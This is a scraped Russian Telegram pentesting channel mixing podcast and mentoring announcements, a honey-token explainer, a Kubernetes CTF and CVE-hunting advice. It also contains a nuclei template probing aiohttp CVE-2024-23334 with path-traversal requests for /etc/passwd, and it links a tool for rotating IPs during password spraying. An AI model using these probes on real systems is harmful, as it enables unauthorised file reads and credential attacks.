Forwarded from Just Security
Айда смотреть! Выпуск уже на канале.
— Как за неделю превратить Open redirect в RCE
— Как взять золото и серебро в Pentest award?
— Как совмещать работу пентестера и багхантинг, чтобы зарабатывать в два раза больше?
— Как не стоять на месте и учиться находить все более и более сложные уязвимости?
Эти и многие другие вопросы обсудили в выпуске с Антоном Грицкевичем (byq) пентестером компании Pentest Limited, багхантером и исследователем с опытом более шести лет. Топ-6 HackerOne Q1 в 2020 году, топ-2 Standoff Bug Bounty сейчас. Сдавал валидные уязвимости в Cisco, Oracle, Mastercard и другие известные компании.
📺 Youtube
™️ VK
🔈 Яндекс Музыка
🎵 Apple podcast
〰️Mave
— Как за неделю превратить Open redirect в RCE
— Как взять золото и серебро в Pentest award?
— Как совмещать работу пентестера и багхантинг, чтобы зарабатывать в два раза больше?
— Как не стоять на месте и учиться находить все более и более сложные уязвимости?
Эти и многие другие вопросы обсудили в выпуске с Антоном Грицкевичем (byq) пентестером компании Pentest Limited, багхантером и исследователем с опытом более шести лет. Топ-6 HackerOne Q1 в 2020 году, топ-2 Standoff Bug Bounty сейчас. Сдавал валидные уязвимости в Cisco, Oracle, Mastercard и другие известные компании.
〰️Mave
Please open Telegram to view this post
VIEW IN TELEGRAM
Исходя из опроса, можно сказать, что многим, не хватает ИБ-шного окружения, которому можно задать вопросы и получить поддержку. Да и без опытных знакомых сложно разобраться в теме.
Также выяснилось, что многим не понятно, с чего начать изучение пентеста. И действительно без четкого плана обучения можно потратить годы на бессвязные материалы и не усвоить основные концепции. Лично мне понадобилось 2 года, чтобы устроиться на первую работу.
С прошлого года я задумался о том, чтобы сделать свою программу обучения. Переложить свой опыт, чтобы в результате человек мог сэкономить время на обучение, получать быструю обратную связь, не платить оверпрайс за обучение, и стать junior+. Как следствие: устроиться на работу с ЗП 100+.
Наполнение получилось следующее (краткий вариант):
Сети
Операционные системы
Виртуализация
Контейнеризация
Алгоритмизация
Web
Базы Данных
Бумажная ИБ
CIA
Юриспруденция
Методологии
Уязвимости
Инструменты
Шаги к Похеку
Составление качественного резюме
Собеседование 1 на 1 + фидбек
Фидбек о пройденном менторстве
Обучение длится 6 месяцев. Все полгода я с вами на связи, лично отвечаю на ваши вопросы и провожу лекции. В результате вы выходите в мир junior+, легко устраиваетесь в компанию, или зарабатываете на bugbounty.
Продукт готов к старту. Я выделил всего 10 мест, осталось 4, так как часть разобрали до полноценного анонса. Чтобы попасть на программу, нужно пройти собеседование, для этого заполните анкету
!набор закрыт!
Начало уже в следующий вторник, времени "на подумать" у вас остаётся всего пару дней.
А в ЛС можете задать любые вопросы касательно обучения. Выдам обратную связь.
Please open Telegram to view this post
VIEW IN TELEGRAM
😁17
Похек
Также я по данному направлению работаю совместно с Иваном, это можно сказать мой менеджер
@Ivanchurakof
Так что не пугайтесь, если он будет вам писать. А данное сообщение является пруфом
@Ivanchurakof
Так что не пугайтесь, если он будет вам писать. А данное сообщение является пруфом
🐳1🌚1
Главное событие весны в сфере информационной безопасности.
⚡️ Staffcop: Совершенно Безопасно ⚡️
Первая конференция, которую организовала компания Staffcop - это платформа для обмена знаниями, нетворкинга и обсуждения последних достижений в области защиты информации.
Вместе с КиберДедом (Андреем Масаловичем) мы приглашаем на день, полный инсайтов и открытий.
📍21 марта в 10:00 по МСК мы ждем на прямую трансляцию всех, кто готов взять на себя контроль над своей цифровой безопасностью.
Полная программа мероприятия и регистрация на сайте
Ждем вас!
ООО «АТОМ БЕЗОПАСНОСТЬ», ИНН 5408298569 , ОГРН 1125476195459 erid:2SDnjcUGTo6
⚡️ Staffcop: Совершенно Безопасно ⚡️
Первая конференция, которую организовала компания Staffcop - это платформа для обмена знаниями, нетворкинга и обсуждения последних достижений в области защиты информации.
Вместе с КиберДедом (Андреем Масаловичем) мы приглашаем на день, полный инсайтов и открытий.
📍21 марта в 10:00 по МСК мы ждем на прямую трансляцию всех, кто готов взять на себя контроль над своей цифровой безопасностью.
Полная программа мероприятия и регистрация на сайте
Ждем вас!
ООО «АТОМ БЕЗОПАСНОСТЬ», ИНН 5408298569 , ОГРН 1125476195459 erid:2SDnjcUGTo6
🔥6😁2
Forwarded from Пакет Безопасности
Попался
Пока все массово обсуждают и пытаются понять, как это за пару месяцев в 2024 году утекло уже более 510 000 000 данных граждан нашей страны (что уже побило рекорд за весь прошлый год), предлагаю обсудить один достаточно интересный тип инструментов, который из профессиональной сферы начинает перетекать в бытовую, а имя ему – Honey Tokens. Да, это пост не только для кибербезопасников, а для всех, кто интересуется кибергигиеной.
Мы с вами уже как-то разбирались в том, что такое HoneyPot, так вот, это его родственник. Если коротко, то эта штука позволяет обнаружить признаки и факт взлома любого вашего устройства или сервиса. Происходит это благодаря специальным меткам, маркерам или триггерам, которые умеют расставлять инструменты класса Honey Tokens. Более того, в некоторых случаях, можно даже вычислить источник взлома.
Как же это работает. На самом деле, всё очень просто. Вы выбираете нужную приманку – например, текстовый файл с названием "Пароли" или папку с названием "Документы" (только не надо класть туда реальные пароли или сканы настоящих документов), а затем буквально устанавливаете на них сигнализацию. То есть, как только кто-то попробуем открыть этот файл или зайти в конкретную папку, вам отправится уведомление о том, что это произошло.
Ну а теперь переходим от теории к практике – вы сами можете попробовать, как это работает, например, с Сanary Tokens. Через него вы сможете настроить ту самую сигнализацию на любой файл, ссылку, айпишник, электронную почту, папку и еще много чего. Уведомления именно в этом сервисе можно настроить на вашу почту. И да, всё это бесплатно и с понятным интерфейсом. Так что пользуйтесь на здоровье и делитесь с близкими.
#Полезное
Твой Пакет Безопасности
Пока все массово обсуждают и пытаются понять, как это за пару месяцев в 2024 году утекло уже более 510 000 000 данных граждан нашей страны (что уже побило рекорд за весь прошлый год), предлагаю обсудить один достаточно интересный тип инструментов, который из профессиональной сферы начинает перетекать в бытовую, а имя ему – Honey Tokens. Да, это пост не только для кибербезопасников, а для всех, кто интересуется кибергигиеной.
Мы с вами уже как-то разбирались в том, что такое HoneyPot, так вот, это его родственник. Если коротко, то эта штука позволяет обнаружить признаки и факт взлома любого вашего устройства или сервиса. Происходит это благодаря специальным меткам, маркерам или триггерам, которые умеют расставлять инструменты класса Honey Tokens. Более того, в некоторых случаях, можно даже вычислить источник взлома.
Как же это работает. На самом деле, всё очень просто. Вы выбираете нужную приманку – например, текстовый файл с названием "Пароли" или папку с названием "Документы" (только не надо класть туда реальные пароли или сканы настоящих документов), а затем буквально устанавливаете на них сигнализацию. То есть, как только кто-то попробуем открыть этот файл или зайти в конкретную папку, вам отправится уведомление о том, что это произошло.
Ну а теперь переходим от теории к практике – вы сами можете попробовать, как это работает, например, с Сanary Tokens. Через него вы сможете настроить ту самую сигнализацию на любой файл, ссылку, айпишник, электронную почту, папку и еще много чего. Уведомления именно в этом сервисе можно настроить на вашу почту. И да, всё это бесплатно и с понятным интерфейсом. Так что пользуйтесь на здоровье и делитесь с близкими.
#Полезное
Твой Пакет Безопасности
🔥14😁3
Forwarded from Cybred
Git-Rotate
Альтернатива IPRotate на базе Github Actions. Позволяет получить большой пул IP-адресов для обхода рейт лимитов.
Статья https://research.aurainfosec.io/pentest/git-rotate/
Утилита https://github.com/dunderhay/git-rotate
Альтернатива IPRotate на базе Github Actions. Позволяет получить большой пул IP-адресов для обхода рейт лимитов.
Статья https://research.aurainfosec.io/pentest/git-rotate/
Утилита https://github.com/dunderhay/git-rotate
GitHub
GitHub - dunderhay/git-rotate: Leveraging GitHub Actions to rotate IP addresses during password spraying attacks to bypass IP-Based…
Leveraging GitHub Actions to rotate IP addresses during password spraying attacks to bypass IP-Based blocking - dunderhay/git-rotate
Forwarded from Mobile AppSec World (Yury Shabalin)
Интеграция с RuMarket
А вот такой повод я не могу пропустить :)
Помните статью про сторы и то, как мы загружали туда нашпигованное уязвимостями приложение?
Так вот, теперь наш продукт Стингрей официально интегрирован с магазином приложений RuMarket! Теперь каждое загружаемое приложение будет проверено нами и разработчик получит отчет о том, что можно улучшить в его продукте.
Я считаю это очень важным шагом в развитии безопасности мобильных приложений и что теперь каждое приложение, которое будет загружено получит возможность узнать, что скрывается внутри с точки зрения безопасности.
Мы будем наращивать количество проверок и возможностей в этой интеграции и уверены, что в следующем нашем исследовании приложения станут намного безопаснее ;)
#Стингрей #rumarket
А вот такой повод я не могу пропустить :)
Помните статью про сторы и то, как мы загружали туда нашпигованное уязвимостями приложение?
Так вот, теперь наш продукт Стингрей официально интегрирован с магазином приложений RuMarket! Теперь каждое загружаемое приложение будет проверено нами и разработчик получит отчет о том, что можно улучшить в его продукте.
Я считаю это очень важным шагом в развитии безопасности мобильных приложений и что теперь каждое приложение, которое будет загружено получит возможность узнать, что скрывается внутри с точки зрения безопасности.
Мы будем наращивать количество проверок и возможностей в этой интеграции и уверены, что в следующем нашем исследовании приложения станут намного безопаснее ;)
#Стингрей #rumarket
Хабр
Разрушители легенд: Как на самом деле магазины проверяют приложения на уязвимости
Intro Всем привет! Снова с вами Юрий Шабалин. Уже много лет я занимаюсь безопасностью мобильных приложений и в своих исследованиях доношу важность этого направления для бизнеса. В одной из прошлых...
🔥10
Mobile AppSec World
Интеграция с RuMarket А вот такой повод я не могу пропустить :) Помните статью про сторы и то, как мы загружали туда нашпигованное уязвимостями приложение? Так вот, теперь наш продукт Стингрей официально интегрирован с магазином приложений RuMarket! Теперь…
На прошлой неделе была довольно громкая новость, о том что Stingray Technologies официально сотрудничает с RuMarket. Поэтому не могу не поздравить Юру Шабалина, со столь знаменательным событием. Его проект с уязвимым приложением, не осталось не замеченным. Так что, так держать!
🔥10🐳1
367616.gif
13.6 MB
#red_team
Важной фичей является не только цветной вывод, что упрощает визуальный просмотр логов. Но он ещё парсит и сразу размечает, что это была за атака, к примеру перебор директорий, краулеры, веб атаки (не различает конкретно XSS, SQLi), но по контексту и запросу легко можно понять, что за атака.
Использование:
cat /var/log/nginx/access.log | teler
или
teler -i /var/log/nginx/access.log
Разницы в использовании нет, но думаю на чересчур большом логе, чтение из самого teler будет производительнее
Утилиты написаны на
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥17
Forwarded from k8s (in)security (r0binak)
Исследователи из WIZ сделали небольшой онлайн CTF "Kubernetes LAN Party" на тему
Сами мы уже прошли челлендж, и однозначно рекомендуем пройти его всем, кто так или иначе имеет дело с безопасностью контейнеров и
P.S – Хотите увидеть прохождение данного CTF от нас?
Kubernetes Security. Он довольно обширно и нетривиально покрывает вопросы сетевой безопасности в Кубере. Разведка в скомпропетированном Pod, обход Istio и Lateral Movement с помощью Kyverno – всё это есть в этом CTF. Ничего дополнительно устанавливать не требуется, терминал доступен прямо из браузера.Сами мы уже прошли челлендж, и однозначно рекомендуем пройти его всем, кто так или иначе имеет дело с безопасностью контейнеров и
Kubernetes.P.S – Хотите увидеть прохождение данного CTF от нас?
🐳3
Forwarded from Заметки Слонсера (Slonser)
#CVE #python #red_team
Исследователи предупреждают, что недавно исправленная уязвимость в Python-библиотеке aiohttp (CVE-2024-23334) уже взята на вооружение хакерами, включая вымогательские группировки, такие как ShadowSyndicate.
Aiohttp — это опенсорсная библиотека, построенная на основе I/O фреймворка Asyncio и предназначенная для обработки большого количества одновременных HTTP-запросов без традиционного потокового нетворкинга. Aiohttp часто используется технологическими компаниями, веб-разработчиками, бэкенд-инженерами и специалистами по анализу данных для создания высокопроизводительных веб-приложений и сервисов, объединяющих данные из множества внешних API.
id: "aiohttp"
info:
name: aiohttp LFI
author: crth0
severity: high
description: CVE-2024-23334 Check LFI.
reference:
- https://github.com/jhonnybonny
classification:
tags: aiohttp,LFI,CVE-2024-23334
http:
- method: GET
path:
- '{{BaseURL}}/static/../etc/passwd'
- '{{BaseURL}}/static/../../etc/passwd'
- '{{BaseURL}}/static/../../../etc/passwd'
- '{{BaseURL}}/static/../../../../etc/passwd'
- '{{BaseURL}}/static/../../../../../etc/passwd'
- '{{BaseURL}}/static/../../../../../../etc/passwd'
- '{{BaseURL}}/static/../../../../../../../etc/passwd'
- '{{BaseURL}}/static/../../../../../../../../etc/passwd'
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "root:")'
condition: and
по сути даже шаблона не нужно, тут обычный path traversal
Please open Telegram to view this post
VIEW IN TELEGRAM
#AMA #менторство
Хорошая новость в том, что у меня всё таки дотянулись руки доделать монтаж по AMA эфиру. Давно обещал, но только вот сделал. В телегу нативно выложить не смог, т.к. запись эфира весит 12 гб (2 часа 5 минут). И дабы не было проблем с авторскими правами на музыку из Яндекс Музыки решил на стриминговые площадки не заливать. На будущее учту это. Поэтому залил туда, где качество не зашакалиться при скачивании:
Плохая новость касается набора на менторство, заявок поступило более 50!! мы не ожидали, что будет столько желающих. Выбрали самых интересных на основе того, что вы писали в заявках. К сожалению многие по итогу сливались из-за того, что были не готовы платить приемлемые деньги за полугодовое обучение. Поэтому для тех, кто ещё думает или копит чеканные монеты будет следующий продут от меня через полгода +-. Так что ждите анонсов. Вчера был первый урок по менторству, полёт отличный
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12🌚4
Forwarded from Что-то на пентестерском
Привет! Если тебе надоел баг баунти, то существует аналог в виде поиска 0-day уязвимостей и получения CVE в open source проектах. Но как именно это делать, где искать и как зарегистрировать CVE — этими секретами сегодня поделится с нами отличный application security специалист с 4-мя CVE за спиной и 4-мя годами опыта работы. Встречайте, друзья, @johnny_shein
Beginner: Если вы хотите попрактиковаться или начать это дело, то цель можно найти на GitHub'е по поиску, например CMS, но со вкладкой "security". Если вкладка есть, то можно спокойно приступать к поиску багов. Её может и не быть, это значит, что придется искать контакты вендора и общаться с ним напрямую. Также стоит посмотреть, сколько звезд у проекта. Нужно минимум 300 звёзд. Это является небольшой гарантией того, что проект поддерживается, разработчики активные. И чем меньше звезд, тем больше шанс найти багу. Если брать WordPress, у него, хоть и много звёзд но он заисследован до дыр.
Skilled: Для более опытных ребят в этой теме существует сайт по баг-баунти для opensource проектов – https://huntr.com. В данный момент он больше делает уклон в AI-проекты, но можно найти и обычные. Также оттуда можно почитать репорты хантеров.
После того, как вы определили, какой проект будете запускать, его нужно просто развернуть у себя на виртуальной машине. На GitHub я обычно смотрю, как происходит установка проекта; если она проста, то можно использовать. В основном я использую команды Docker для установки и просто разворачиваю проект у себя.
Чтобы найти 0-day, я читаю код. В первую очередь рассматриваю метод black box. Если какой-то механизм в проекте кажется интересным или payload не работает, я обращаюсь к коду. Также никто ничего не скажет вам, если пройдётесь по коду с использованием SAST и если подтвердить найденную уязвимость через динамику, то можно получить CVE.
P.S. Если хочешь увидеть как это делать на практике — загляни в полезные ссылки.
Получить CVE можно через huntr использовав публикацию отчета, также придется говорить где в коде указать фикс уязвимости.
Можно через github, но нужно искать контакты разработчика, он будет сам регистрировать CVE, либо использовать фичу в gihub — advisory database
Да, я нашел уязвимость Insufficient Session Expiration. Ее суть в том, что если в двух разных браузерах зайти на ресурс под одним аккаунтом, изменить пароль и разлогиниться, сессия в первом браузере остается активной.
За это мне и дали первую CVE 😉
ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥21
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Известно, что с контейнерами бывает огромное количество разнообразных проблем, в том числе, связанных с информационной безопасностью. Как их избежать и не дать взломщику лазеек в ваш сервис — разбираемся в этой статье.
Проблемы с безопасностью
Типичные проблемы, связанные с информационной безопасностью контейнеров:
Уязвимые компоненты. Когда вы деплоите и собираете контейнер с уязвимыми компонентами, то они никуда не денутся и всегда будут в нём присутствовать.
Ошибки конфигурации. Когда в среде выполнения контейнеров или в самих контейнерах допущены ошибки при конфигурировании, злоумышленник может этим воспользоваться.
Наличие root-пользователя в контейнере. Эта проблема может звучать немного по-детски. Но это бич многих компаний — часто у них запускаются продукты от привилегированного пользователя внутри контейнеров. Тоже запускаете свои приложения в контейнере под root’ом? Мы расскажем, почему так однозначно не стоит делать.
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11😁1